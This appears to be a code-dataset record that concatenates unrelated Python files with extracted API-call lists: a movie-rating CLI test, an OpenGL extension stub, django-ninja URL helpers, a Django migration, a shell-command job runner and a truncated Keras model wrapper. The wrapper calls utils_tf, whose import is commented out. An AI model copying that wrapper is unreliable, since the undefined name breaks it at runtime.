(['"""relu"""'], {}), "('relu')\n", (2693, 2701), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2869, 2887), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (2879, 2887), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((2903, 2933), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (2915, 2933), False, 'from keras.layers import Convolution2D, MaxPooling2D\n'), ((3153, 3171), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3163, 3171), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3339, 3357), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3349, 3357), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3373, 3403), 'keras.layers.MaxPooling2D', 'MaxPooling2D', ([], {'pool_size': '(2, 2)'}), '(pool_size=(2, 2))\n', (3385, 3403), False, 'from keras.layers import Convolution2D, MaxPooling2D\n'), ((3451, 3460), 'keras.layers.Flatten', 'Flatten', ([], {}), '()\n', (3458, 3460), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3558, 3576), 'keras.layers.Activation', 'Activation', (['"""relu"""'], {}), "('relu')\n", (3568, 3576), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3592, 3604), 'keras.layers.Dropout', 'Dropout', (['(0.5)'], {}), '(0.5)\n', (3599, 3604), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((3709, 3730), 'keras.layers.Activation', 'Activation', (['"""softmax"""'], {}), "('softmax')\n", (3719, 3730), False, 'from keras.layers import Dense, Dropout, Activation, Flatten\n'), ((6636, 6681), 'numpy.reshape', 'np.reshape', (['activation', '(num, col * map_size)'], {}), '(activation, (num, col * map_size))\n', (6646, 6681), True, 'import numpy as np\n'), ((6911, 6962), 'numpy.reshape', 'np.reshape', (['trans_activation', '(col, num * map_size)'], {}), '(trans_activation, (col, num * map_size))\n', (6921, 6962), True, 'import numpy as np\n'), ((7182, 7231), 'numpy.mean', 'np.mean', (['matrix_activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(matrix_activation, axis=0, keepdims=True)\n', (7189, 7231), True, 'import numpy as np\n'), ((7300, 7348), 'numpy.std', 'np.std', (['matrix_activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(matrix_activation, axis=0, keepdims=True)\n', (7306, 7348), True, 'import numpy as np\n'), ((7571, 7613), 'numpy.mean', 'np.mean', (['activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(activation, axis=0, keepdims=True)\n', (7578, 7613), True, 'import numpy as np\n'), ((7682, 7723), 'numpy.std', 'np.std', (['activation'], {'axis': '(0)', 'keepdims': '(True)'}), '(activation, axis=0, keepdims=True)\n', (7688, 7723), True, 'import numpy as np\n'), ((2599, 2608), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2601, 2608), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2656, 2665), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2658, 2665), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2785, 2794), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2787, 2794), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((2842, 2851), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (2844, 2851), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3069, 3078), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3071, 3078), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3126, 3135), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3128, 3135), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3255, 3264), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3257, 3264), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3312, 3321), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3314, 3321), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3503, 3512), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3505, 3512), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3531, 3540), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3533, 3540), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3654, 3663), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3656, 3663), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((3682, 3691), 'keras.regularizers.l2', 'l2', ([], {'l': '(0.0)'}), '(l=0.0)\n', (3684, 3691), False, 'from keras.regularizers import l2, activity_l1l2\n'), ((4504, 4522), 'keras.backend.learning_phase', 'K.learning_phase', ([], {}), '()\n', (4520, 4522), True, 'from keras import backend as K\n'), ((7810, 7841), 'numpy.transpose', 'np.transpose', (['normalized_output'], {}), '(normalized_output)\n', (7822, 7841), True, 'import numpy as np\n'), ((7442, 7473), 'numpy.transpose', 'np.transpose', (['normalized_output'], {}), '(normalized_output)\n', (7454, 7473), True, 'import numpy as np\n')] |
import unittest
import subprocess
import re
from os import environ
class MoveRatingTestBasic(unittest.TestCase):
def setUp(self):
if environ.get('OMDB_API_KEY') is None or len(environ.get('OMDB_API_KEY')) < 1:
raise Exception("The OMDB_API_KEY environment variable is not set. Unable to run tests without it")
def test_existing_movie(self):
p = self._movie_rating_cmd("--title 'Guardians of the Galaxy'")
rating = p.stdout.rstrip()
self.assertTrue(re.match(r'^\d\d%$', rating), "Existing movie has a rating ({})".format(p.stdout))
def test_existing_movie_bad_year(self):
p = self._movie_rating_cmd("--title 'Guardians of the Galaxy' --year 1999")
self.assertNotEqual(p.returncode, 0, "Non-zero return code")
self.assertTrue(p.stdout == "", "Bad Year ({}) doesn't have a rating")
error = p.stderr.rstrip()
self.assertEqual("We're sorry, but a movie by that name (Guardians of the Galaxy) in that year (1999) was not found", error, "Correct error for bad year")
def test_typo_movie(self):
p = self._movie_rating_cmd("--title 'Napolean Dynamite'")
self.assertNotEqual(p.returncode, 0, "Non-zero return code")
self.assertTrue(p.stdout == "", "Typo ({}) doesn't have a rating")
error = p.stderr.rstrip()
self.assertEqual("We're sorry, but a movie by that name (Napolean Dynamite) was not found", error, "Correct error for typo movie")
def test_missing_title(self):
p = self._movie_rating_cmd("")
self.assertNotEqual(p.returncode, 0, "Non-zero return code")
self.assertTrue('arguments are required: --title' in p.stderr, "Correct error for missing title")
def test_invalid_year(self):
p = self._movie_rating_cmd("--title Foo --year 200a")
self.assertNotEqual(p.returncode, 0, "Non-zero return code")
self.assertTrue('--year: invalid int value' in p.stderr, "Correct error for invalid year")
def test_invalid_api_key(self):
p = subprocess.run("/usr/src/app/movie_rating.py --api-key foo --title foo", shell=True, capture_output=True, text=True)
self.assertNotEqual(p.returncode, 0, "Non-zero return code")
self.assertTrue("API Key was not valid" in p.stderr, "Correct error for invalid api-key")
def _movie_rating_cmd(self, args):
p = subprocess.run("/usr/src/app/movie_rating.py {}".format(args), shell=True, capture_output=True, text=True)
return p
if __name__ == '__main__':
unittest.main()
| [
"unittest.main",
"subprocess.run",
"re.match",
"os.environ.get"
] | [((2529, 2544), 'unittest.main', 'unittest.main', ([], {}), '()\n', (2542, 2544), False, 'import unittest\n'), ((2036, 2156), 'subprocess.run', 'subprocess.run', (['"""/usr/src/app/movie_rating.py --api-key foo --title foo"""'], {'shell': '(True)', 'capture_output': '(True)', 'text': '(True)'}), "('/usr/src/app/movie_rating.py --api-key foo --title foo',\n shell=True, capture_output=True, text=True)\n", (2050, 2156), False, 'import subprocess\n'), ((502, 531), 're.match', 're.match', (['"""^\\\\d\\\\d%$"""', 'rating'], {}), "('^\\\\d\\\\d%$', rating)\n", (510, 531), False, 'import re\n'), ((146, 173), 'os.environ.get', 'environ.get', (['"""OMDB_API_KEY"""'], {}), "('OMDB_API_KEY')\n", (157, 173), False, 'from os import environ\n'), ((189, 216), 'os.environ.get', 'environ.get', (['"""OMDB_API_KEY"""'], {}), "('OMDB_API_KEY')\n", (200, 216), False, 'from os import environ\n')] |
'''OpenGL extension ARB.shader_clock
This module customises the behaviour of the
OpenGL.raw.GL.ARB.shader_clock to provide a more
Python-friendly API
Overview (from the spec)
This extension exposes a 64-bit monotonically incrementing shader
counter which may be used to derive local timing information within
a single shader invocation.
The official definition of this extension is available here:
http://www.opengl.org/registry/specs/ARB/shader_clock.txt
'''
from OpenGL import platform, constant, arrays
from OpenGL import extensions, wrapper
import ctypes
from OpenGL.raw.GL import _types, _glgets
from OpenGL.raw.GL.ARB.shader_clock import *
from OpenGL.raw.GL.ARB.shader_clock import _EXTENSION_NAME
def glInitShaderClockARB():
'''Return boolean indicating whether this extension is available'''
from OpenGL import extensions
return extensions.hasGLExtension( _EXTENSION_NAME )
### END AUTOGENERATED SECTION | [
"OpenGL.extensions.hasGLExtension"
] | [((861, 903), 'OpenGL.extensions.hasGLExtension', 'extensions.hasGLExtension', (['_EXTENSION_NAME'], {}), '(_EXTENSION_NAME)\n', (886, 903), False, 'from OpenGL import extensions\n')] |
from functools import partial
from django.urls import path
from .views import openapi_json, swagger, home
def get_openapi_urls(api: "NinjaAPI"):
result = [path("", partial(home, api=api), name=f"api-root")]
if api.openapi_url:
result.append(
path(
api.openapi_url.lstrip("/"),
partial(openapi_json, api=api),
name="openapi-json",
)
)
assert (
api.openapi_url != api.docs_url
), "Please use different urls for openapi_url and docs_url"
if api.docs_url:
result.append(
path(
api.docs_url.lstrip("/"),
partial(swagger, api=api),
name="openapi-swagger",
)
)
return result
| [
"functools.partial"
] | [((170, 192), 'functools.partial', 'partial', (['home'], {'api': 'api'}), '(home, api=api)\n', (177, 192), False, 'from functools import partial\n'), ((340, 370), 'functools.partial', 'partial', (['openapi_json'], {'api': 'api'}), '(openapi_json, api=api)\n', (347, 370), False, 'from functools import partial\n'), ((704, 729), 'functools.partial', 'partial', (['swagger'], {'api': 'api'}), '(swagger, api=api)\n', (711, 729), False, 'from functools import partial\n')] |
# -*- coding: utf-8 -*-
# Generated by Django 1.11.7 on 2017-12-29 18:33
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('places', '0027_auto_20171229_1606'),
]
operations = [
migrations.AddField(
model_name='fieldtype',
name='is_shown_in_about_place',
field=models.BooleanField(default=False, verbose_name='Show in About Place section'),
),
]
| [
"django.db.models.BooleanField"
] | [((418, 496), 'django.db.models.BooleanField', 'models.BooleanField', ([], {'default': '(False)', 'verbose_name': '"""Show in About Place section"""'}), "(default=False, verbose_name='Show in About Place section')\n", (437, 496), False, 'from django.db import migrations, models\n')] |
from builtins import str
import collections
import contextlib
import functools
import itertools
import io
import os
import re
import six
import subprocess
import threading
import tempfile
import time
import traceback
import termcolor
from . import command
from . import parser
COLORS = ['yellow', 'blue', 'red', 'green', 'magenta', 'cyan']
IO_ERROR_RETRY_INTERVAL = 0.1
IO_ERROR_RETRY_ATTEMPTS = 100
RunnerResults = collections.namedtuple('RunnerResults', ('failed', 'running', 'interrupt'))
def print_exceptions(f):
""" Exceptions in threads don't show a traceback so this decorator will dump them to stdout """
@functools.wraps(f)
def wrapper(*args, **kwargs):
try:
return f(*args, **kwargs)
except:
termcolor.cprint(traceback.format_exc(), 'red')
print('-' * 20)
raise
return wrapper
# See https://bugs.python.org/issue1167930 for why thread join ignores interrupts
class InterruptibleThread(threading.Thread):
POLL_FREQ = 0.1
def join(self, timeout=None):
start_time = time.time()
while not timeout or time.time() - start_time < timeout:
super(InterruptibleThread, self).join(timeout or self.POLL_FREQ)
if not self.is_alive():
return
return
class Runner(object):
def __init__(self, tmpdir, environment, retry_interval=None, shell='/bin/bash',
output_timeout=None):
self.tmpdir = tmpdir
self._retry_interval = retry_interval
self._shell = shell
self._output_timeout = output_timeout
self._procs_lock = threading.Lock()
self._procs = []
self._output_lock = threading.Lock()
self._colors = collections.OrderedDict((c, 0) for c in COLORS)
self._color_lock = threading.Lock()
self._environment = environment
self._name_counts = {}
self._dead = False
self.threads_lock = threading.Lock()
self.threads = collections.defaultdict(list)
self._results = {}
def kill_all(self):
""" Kills all running threads """
self._dead = True
while True: # Keep killing procs until the threads terminate
with self.threads_lock:
if any(t.isAlive() for t in itertools.chain(*self.threads.values())):
with self._procs_lock:
for proc in self._procs:
proc.kill()
time.sleep(0.1)
else:
return True
@staticmethod
def print_lines(lines, prefix, color, end=''):
for line in lines:
for _ in range(IO_ERROR_RETRY_ATTEMPTS):
try:
termcolor.cprint(prefix + str(line), color, end=end)
except IOError:
time.sleep(IO_ERROR_RETRY_INTERVAL)
else:
break
@property
def env(self):
env = os.environ.copy()
env.update(self._environment)
return env
@property
def output_timeout(self):
return self._output_timeout
def print_command(self, cmd, prefix='', color='white', message='Running'):
with self._output_lock: # Use a lock to keep output lines separate
lines = cmd.split('\n')
message += ': '
if len(lines) > 1:
lines = [message] + lines + ['---']
else:
lines = [message + lines[0]]
self.print_lines(lines, '{}| '.format(prefix), color=color, end='\n')
@contextlib.contextmanager
def using_color(self):
with self._color_lock:
# Pick the oldest color, favoring colors not in use
color = next(
itertools.chain((c for c, count in self._colors.items() if count == 0),
self._colors.items()))
self._colors[color] = self._colors.pop(color) + 1 # Re-add at the end
try:
yield color
finally:
with self._color_lock:
self._colors[color] -= 1
def create_name(self, name, command):
if name:
command_name = name
else:
command_name = re.search('\w+', command).group(0)
if command_name in self._name_counts:
self._name_counts[command_name] += 1
command_name = '{}_{}'.format(command_name, self._name_counts[command_name])
else:
self._name_counts[command_name] = 0
return command_name
def _run(self, command, name, start_time, color, skip=False, timeout=None, ignore_status=False,
background=False, retries=0, interval=None):
if skip:
self.print_command(command.command, message='Skipping')
return True
interval = interval or self._retry_interval
for attempt in range(0, retries + 1):
command_name = self.create_name(name, command.command)
stdout_path = os.path.join(self.tmpdir, '{}_{}.stdout'.format(command_name, attempt))
stderr_path = os.path.join(self.tmpdir, '{}_{}.stderr'.format(command_name, attempt))
with io.open(stdout_path, 'wb') as stdout_writer, \
io.open(stdout_path, 'rb') as stdout_reader, \
io.open(stderr_path, 'wb') as stderr_writer, \
io.open(stderr_path, 'rb') as stderr_reader:
# See http://stackoverflow.com/questions/4789837/how-to-terminate-a-python-subprocess-launched-with-shell-true # noqa
proc = subprocess.Popen(command.command, shell=True, executable=self._shell,
stdout=stdout_writer, stderr=stderr_writer, env=self.env)
with self._procs_lock:
self._procs.append(proc)
prefix = name or str(proc.pid)
self.print_command(
command.command,
message=('Retrying ({})'.format(attempt) if attempt > 0 else 'Running'),
prefix=prefix, color=color)
last_output_time = time.time()
def print_output():
with self._output_lock:
out = stdout_reader.readlines()
err = stderr_reader.readlines()
self.print_lines(out, '{}| '.format(prefix), color)
self.print_lines(err, '{}: '.format(prefix), color)
return bool(out or err)
while proc.poll() is None:
saw_output = print_output()
current_time = time.time()
if (timeout is not None and current_time > last_output_time + timeout and
not background):
proc.kill()
termcolor.cprint('{}! OUTPUT TIMEOUT ({:0.1f}s)'.format(prefix, timeout),
color, attrs=['bold'])
elif saw_output:
last_output_time = current_time
time.sleep(0.05)
print_output()
with self._procs_lock:
self._procs.remove(proc)
passed = not bool(proc.returncode)
if passed or self._dead:
break
elif attempt < retries:
termcolor.cprint('{}| Retrying after {}s'.format(prefix, interval), color)
time.sleep(interval)
elapsed_time = time.time() - start_time
if passed:
message = 'Done'
elif self._dead:
message = 'Terminated'
elif ignore_status:
message = 'Failed'
else:
message = 'FAILED'
termcolor.cprint('{}| {}'.format(prefix, message), attrs=(None if passed else ['bold']),
color=color, end='')
termcolor.cprint(" {}({:0.1f}s)".format(
'(ignored) ' if (not passed and ignore_status) else '', elapsed_time), color=color)
return passed
@functools.wraps(_run)
def run(self, *args, **kwargs):
with self.using_color() as color:
return self._run(*args, color=color, **kwargs)
@print_exceptions # Ensure we see thread exceptions
def _run_job(self, job, job_id, **kwargs):
passed = job.run(**kwargs)
self._results[job_id] = passed
def start(self, cmd, job_id, shared_context):
""" Start a job.
Returns:
A tuple: (Job ID, True/False/None = Success/Failure/Background)
"""
self._results[job_id] = None
job = command.Job(command=cmd)
job.synchronous_prepare(shared_context)
thread = InterruptibleThread(
target=self._run_job,
kwargs=dict(runner=self,
job=job,
job_id=job_id,
shared_context=shared_context))
thread.daemon = True # Ensure this thread doesn't outlive the main thread
# Keep track of all running threads
with self.threads_lock:
if job.background:
self.threads['background'].append(thread)
else:
self.threads['normal'].append(thread)
thread.start()
# Wait if command is synchronous
if not (job.background or job.name):
thread.join()
return self._results.get(job_id)
def finish(self):
""" Waits for non-background jobs. """
# Wait for all the non-background threads to complete
for t in self.threads['normal']:
t.join()
def failures(self):
""" Returns failed jobs """
return [id for id, result in six.iteritems(self._results) if result is False]
def running(self):
""" Returns jobs that are still running jobs """
return [id for id, result in six.iteritems(self._results) if result is None]
def run_commands(commands, retry_interval=None, shell='/bin/bash', tmpdir=None, output_timeout=None,
environment={}):
"""
Args:
commands: A list of commands
retry_interval: Time between retries in seconds
shell: Choice of shell
tmpdir: temporary directory to store output logs
output_timeout: Fail command if it takes longer than this number of seconds
environment: Environment variables to use during command run
Returns:
RunnerResults (a tuple):
A list of failed commands.
A list of commands that are still running.
"""
tmpdir = tmpdir or tempfile.gettempdir()
assert type(commands) == list, (
"Expected command list to be a list but got {}".format(type(commands)))
job_runner = Runner(tmpdir=tmpdir, retry_interval=retry_interval, shell=shell,
environment=environment, output_timeout=output_timeout)
shared_context = command.SharedContext()
started_commands = {}
def results(interrupt=False):
return RunnerResults(
failed=[started_commands[id] for id in job_runner.failures()],
running=[started_commands[id] for id in job_runner.running()],
interrupt=interrupt)
job_id_counter = itertools.count()
try:
for cmd in parser.generate_commands(commands):
job_id = next(job_id_counter)
started_commands[job_id] = cmd
result = job_runner.start(cmd, job_id=job_id, shared_context=shared_context)
if result is False:
break
job_runner.finish()
return results()
except KeyboardInterrupt:
return results(interrupt=True)
finally:
job_runner.kill_all()
| [
"traceback.format_exc",
"collections.OrderedDict",
"collections.namedtuple",
"threading.Lock",
"subprocess.Popen",
"functools.wraps",
"os.environ.copy",
"io.open",
"time.sleep",
"builtins.str",
"itertools.count",
"collections.defaultdict",
"tempfile.gettempdir",
"six.iteritems",
"time.ti... | [((422, 497), 'collections.namedtuple', 'collections.namedtuple', (['"""RunnerResults"""', "('failed', 'running', 'interrupt')"], {}), "('RunnerResults', ('failed', 'running', 'interrupt'))\n", (444, 497), False, 'import collections\n'), ((630, 648), 'functools.wraps', 'functools.wraps', (['f'], {}), '(f)\n', (645, 648), False, 'import functools\n'), ((8182, 8203), 'functools.wraps', 'functools.wraps', (['_run'], {}), '(_run)\n', (8197, 8203), False, 'import functools\n'), ((11384, 11401), 'itertools.count', 'itertools.count', ([], {}), '()\n', (11399, 11401), False, 'import itertools\n'), ((1081, 1092), 'time.time', 'time.time', ([], {}), '()\n', (1090, 1092), False, 'import time\n'), ((1632, 1648), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1646, 1648), False, 'import threading\n'), ((1702, 1718), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1716, 1718), False, 'import threading\n'), ((1742, 1789), 'collections.OrderedDict', 'collections.OrderedDict', (['((c, 0) for c in COLORS)'], {}), '((c, 0) for c in COLORS)\n', (1765, 1789), False, 'import collections\n'), ((1817, 1833), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1831, 1833), False, 'import threading\n'), ((1960, 1976), 'threading.Lock', 'threading.Lock', ([], {}), '()\n', (1974, 1976), False, 'import threading\n'), ((2000, 2029), 'collections.defaultdict', 'collections.defaultdict', (['list'], {}), '(list)\n', (2023, 2029), False, 'import collections\n'), ((2992, 3009), 'os.environ.copy', 'os.environ.copy', ([], {}), '()\n', (3007, 3009), False, 'import os\n'), ((10737, 10758), 'tempfile.gettempdir', 'tempfile.gettempdir', ([], {}), '()\n', (10756, 10758), False, 'import tempfile\n'), ((7627, 7638), 'time.time', 'time.time', ([], {}), '()\n', (7636, 7638), False, 'import time\n'), ((5246, 5272), 'io.open', 'io.open', (['stdout_path', '"""wb"""'], {}), "(stdout_path, 'wb')\n", (5253, 5272), False, 'import io\n'), ((5313, 5339), 'io.open', 'io.open', (['stdout_path', '"""rb"""'], {}), "(stdout_path, 'rb')\n", (5320, 5339), False, 'import io\n'), ((5380, 5406), 'io.open', 'io.open', (['stderr_path', '"""wb"""'], {}), "(stderr_path, 'wb')\n", (5387, 5406), False, 'import io\n'), ((5447, 5473), 'io.open', 'io.open', (['stderr_path', '"""rb"""'], {}), "(stderr_path, 'rb')\n", (5454, 5473), False, 'import io\n'), ((5651, 5782), 'subprocess.Popen', 'subprocess.Popen', (['command.command'], {'shell': '(True)', 'executable': 'self._shell', 'stdout': 'stdout_writer', 'stderr': 'stderr_writer', 'env': 'self.env'}), '(command.command, shell=True, executable=self._shell,\n stdout=stdout_writer, stderr=stderr_writer, env=self.env)\n', (5667, 5782), False, 'import subprocess\n'), ((6202, 6213), 'time.time', 'time.time', ([], {}), '()\n', (6211, 6213), False, 'import time\n'), ((9859, 9887), 'six.iteritems', 'six.iteritems', (['self._results'], {}), '(self._results)\n', (9872, 9887), False, 'import six\n'), ((10027, 10055), 'six.iteritems', 'six.iteritems', (['self._results'], {}), '(self._results)\n', (10040, 10055), False, 'import six\n'), ((779, 801), 'traceback.format_exc', 'traceback.format_exc', ([], {}), '()\n', (799, 801), False, 'import traceback\n'), ((1122, 1133), 'time.time', 'time.time', ([], {}), '()\n', (1131, 1133), False, 'import time\n'), ((2494, 2509), 'time.sleep', 'time.sleep', (['(0.1)'], {}), '(0.1)\n', (2504, 2509), False, 'import time\n'), ((4266, 4292), 're.search', 're.search', (['"""\\\\w+"""', 'command'], {}), "('\\\\w+', command)\n", (4275, 4292), False, 'import re\n'), ((5938, 5951), 'builtins.str', 'str', (['proc.pid'], {}), '(proc.pid)\n', (5941, 5951), False, 'from builtins import str\n'), ((6734, 6745), 'time.time', 'time.time', ([], {}), '()\n', (6743, 6745), False, 'import time\n'), ((7197, 7213), 'time.sleep', 'time.sleep', (['(0.05)'], {}), '(0.05)\n', (7207, 7213), False, 'import time\n'), ((7582, 7602), 'time.sleep', 'time.sleep', (['interval'], {}), '(interval)\n', (7592, 7602), False, 'import time\n'), ((2860, 2895), 'time.sleep', 'time.sleep', (['IO_ERROR_RETRY_INTERVAL'], {}), '(IO_ERROR_RETRY_INTERVAL)\n', (2870, 2895), False, 'import time\n'), ((2781, 2790), 'builtins.str', 'str', (['line'], {}), '(line)\n', (2784, 2790), False, 'from builtins import str\n')] |
"""
Model construction utilities based on keras
"""
import warnings
from distutils.version import LooseVersion
import tensorflow.keras
from tensorflow.keras.models import Sequential
from tensorflow.keras.layers import Dense, Activation, Flatten
# from cleverhans.model import Model, NoSuchLayerError
import tensorflow as tf
from abc import ABCMeta
class NoSuchLayerError(ValueError):
"""Raised when a layer that does not exist is requested."""
class AModel(object):
"""
An abstract interface for model wrappers that exposes model symbols
needed for making an attack. This abstraction removes the dependency on
any specific neural network package (e.g. Keras) from the core
code of CleverHans. It can also simplify exposing the hidden features of a
model when a specific package does not directly expose them.
"""
__metaclass__ = ABCMeta
O_LOGITS, O_PROBS, O_FEATURES = "logits probs features".split()
def __init__(
self, scope=None, nb_classes=None, hparams=None, needs_dummy_fprop=False
):
"""
Constructor.
:param scope: str, the name of model.
:param nb_classes: integer, the number of classes.
:param hparams: dict, hyper-parameters for the model.
:needs_dummy_fprop: bool, if True the model's parameters are not
created until fprop is called.
"""
self.scope = scope or self.__class__.__name__
self.nb_classes = nb_classes
self.hparams = hparams or {}
self.needs_dummy_fprop = needs_dummy_fprop
def __call__(self, *args, **kwargs):
"""
For compatibility with functions used as model definitions (taking
an input tensor and returning the tensor giving the output
of the model on that input).
"""
warnings.warn(
"Model.__call__ is deprecated. "
"The call is ambiguous as to whether the output should "
"be logits or probabilities, and getting the wrong one "
"can cause serious problems. "
"The output actually is probabilities, which are a very "
"dangerous thing to use as part of any interface for "
"cleverhans, because softmax probabilities are prone "
"to gradient masking."
"On or after 2019-04-24, this method will change to raise "
"an exception explaining why Model.__call__ should not be "
"used."
)
return self.get_probs(*args, **kwargs)
def get_logits(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the output logits
(i.e., the values fed as inputs to the softmax layer).
"""
outputs = self.fprop(x, **kwargs)
if self.O_LOGITS in outputs:
return outputs[self.O_LOGITS]
raise NotImplementedError(
str(type(self)) + "must implement `get_logits`"
" or must define a " + self.O_LOGITS + " output in `fprop`"
)
def get_predicted_class(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the predicted label
"""
return tf.argmax(self.get_logits(x, **kwargs), axis=1)
def get_probs(self, x, **kwargs):
"""
:param x: A symbolic representation (Tensor) of the network input
:return: A symbolic representation (Tensor) of the output
probabilities (i.e., the output values produced by the softmax layer).
"""
d = self.fprop(x, **kwargs)
if self.O_PROBS in d:
output = d[self.O_PROBS]
min_prob = tf.reduce_min(output)
max_prob = tf.reduce_max(output)
asserts = [
utils_tf.assert_greater_equal(min_prob, tf.cast(0.0, min_prob.dtype)),
utils_tf.assert_less_equal(max_prob, tf.cast(1.0, min_prob.dtype)),
]
with tf.control_dependencies(asserts):
output = tf.identity(output)
return output
elif self.O_LOGITS in d:
return tf.nn.softmax(logits=d[self.O_LOGITS])
else:
raise ValueError("Cannot find probs or logits.")
def fprop(self, x, **kwargs):
"""
Forward propagation to compute the model outputs.
:param x: A symbolic representation of the network input
:return: A dictionary mapping layer names to the symbolic
representation of their output.
"""
raise NotImplementedError("`fprop` not implemented.")
def get_params(self):
"""
Provides access to the model's parameters.
:return: A list of all Variables defining the model parameters.
"""
if hasattr(self, "params"):
return list(self.params)
# Catch eager execution and assert function overload.
try:
if tf.executing_eagerly():
raise NotImplementedError(
"For Eager execution - get_params " "must be overridden."
)
except AttributeError:
pass
# For graph-based execution
scope_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + "/"
)
if len(scope_vars) == 0:
self.make_params()
scope_vars = tf.get_collection(
tf.GraphKeys.TRAINABLE_VARIABLES, self.scope + "/"
)
assert len(scope_vars) > 0
# Make sure no parameters have been added or removed
if hasattr(self, "num_params"):
if self.num_params != len(scope_vars):
print("Scope: ", self.scope)
print("Expected " + str(self.num_params) + " variables")
print("Got " + str(len(scope_vars)))
for var in scope_vars:
print("\t" + str(var))
assert False
else:
self.num_params = len(scope_vars)
return scope_vars
def make_params(self):
"""
Create all Variables to be returned later by get_params.
By default this is a no-op.
Models that need their fprop to be called for their params to be
created can set `needs_dummy_fprop=True` in the constructor.
"""
if self.needs_dummy_fprop:
if hasattr(self, "_dummy_input"):
return
self._dummy_input = self.make_input_placeholder()
self.fprop(self._dummy_input)
def get_layer_names(self):
"""Return the list of exposed layers for this model."""
raise NotImplementedError
def get_layer(self, x, layer, **kwargs):
"""Return a layer output.
:param x: tensor, the input to the network.
:param layer: str, the name of the layer to compute.
:param **kwargs: dict, extra optional params to pass to self.fprop.
:return: the content of layer `layer`
"""
return self.fprop(x, **kwargs)[layer]
def make_input_placeholder(self):
"""Create and return a placeholder representing an input to the model.
This method should respect context managers (e.g. "with tf.device")
and should not just return a reference to a single pre-created
placeholder.
"""
raise NotImplementedError(
str(type(self)) + " does not implement " "make_input_placeholder"
)
def make_label_placeholder(self):
"""Create and return a placeholder representing class labels.
This method should respect context managers (e.g. "with tf.device")
and should not just return a reference to a single pre-created
placeholder.
"""
raise NotImplementedError(
str(type(self)) + " does not implement " "make_label_placeholder"
)
def __hash__(self):
return hash(id(self))
def __eq__(self, other):
return self is other
class KerasModelWrapper(AModel):
"""
An implementation of `Model` that wraps a Keras model. It
specifically exposes the hidden features of a model by creating new models.
The symbolic graph is reused and so there is little overhead. Splitting
in-place operations can incur an overhead.
"""
def __init__(self, model, num_class=10):
"""
Create a wrapper for a Keras model
:param model: A Keras model
"""
super(KerasModelWrapper, self).__init__()
if model is None:
raise ValueError('model argument must be supplied.')
self.model = model
self.keras_model = None
self.num_classes = num_class
def _get_softmax_name(self):
"""
Looks for the name of the softmax layer.
:return: Softmax layer name
"""
for layer in self.model.layers:
cfg = layer.get_config()
if cfg['name'] == 'average_1':
return layer.name
raise Exception("No softmax layers found")
def _get_logits_name(self):
"""
Looks for the name of the layer producing the logits.
:return: name of layer producing the logits
"""
softmax_name = self._get_softmax_name()
softmax_layer = self.model.get_layer(softmax_name)
if not isinstance(softmax_layer, Activation):
# In this case, the activation is part of another layer
return softmax_name
if hasattr(softmax_layer, 'inbound_nodes'):
warnings.warn(
"Please update your version to keras >= 2.1.3; "
"support for earlier keras versions will be dropped on "
"2018-07-22")
node = softmax_layer.inbound_nodes[0]
else:
node = softmax_layer._inbound_nodes[0]
logits_name = node.inbound_layers[0].name
return logits_name
def get_logits(self, x):
"""
:param x: A symbolic representation of the network input.
:return: A symbolic representation of the logits
"""
# logits_name = self._get_logits_name()
# logits_layer = self.get_layer(x, logits_name)
# # Need to deal with the case where softmax is part of the
# # logits layer
# if logits_name == self._get_softmax_name():
# softmax_logit_layer = self.get_layer(x, logits_name)
# # The final op is the softmax. Return its input
# logits_layer = softmax_logit_layer._op.inputs[0]
prob = self.get_probs(x)
logits = tf.log(prob)
return logits
def get_probs(self, x):
"""
